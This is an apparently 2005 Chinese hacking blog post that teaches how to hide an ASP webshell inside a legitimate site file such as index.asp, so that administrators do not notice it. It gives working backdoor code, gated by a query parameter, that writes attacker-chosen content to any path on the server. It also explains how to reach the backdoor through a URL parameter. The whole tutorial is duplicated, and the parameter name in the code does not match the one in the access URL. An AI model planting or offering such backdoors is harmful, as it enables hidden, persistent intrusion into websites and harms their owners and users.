一种隐藏ASP木马的方法
作者:at1s 日期:2005-03-25
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL
下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="shell" then %>
****************************
<% end if %>
在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽。
================================
我们在index.asp隐藏自己的asp木马
把Newmm代码加到index.asp中
<% if request("huahua")="52" then %>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "" %>
<% end if %>
然后我们打开http://qq/index.asp
一切正常,没什么反映
在http://qq/index.asp后面加?ihai=52
http://qq/index.asp?ihai=52
看到我们马儿没
这个后门比较隐秘吧,总比我们一个有着自己名字的后门好吧
所以我们要隐藏好我们的SHELL
下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="shell" then %>
****************************
<% end if %>
在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽。
================================
我们在index.asp隐藏自己的asp木马
把Newmm代码加到index.asp中
<% if request("huahua")="52" then %>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "" %>
<% end if %>
然后我们打开http://qq/index.asp
一切正常,没什么反映
在http://qq/index.asp后面加?ihai=52
http://qq/index.asp?ihai=52
看到我们马儿没
这个后门比较隐秘吧,总比我们一个有着自己名字的后门好吧
[本日志由 at1s 于 2005-03-25 05:03 PM 编辑]
上一篇: 小巧的Gif动画制作工具---giftools 3.1下一篇: 让ASP木马不被杀
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 1 | 引用: 0 | 查看次数: 3753
英雄无敌[2005-03-25 07:01 PM | | | 61.51.129.52 | | 回复]
沙发前提,需要filesystem组件支持~
发表评论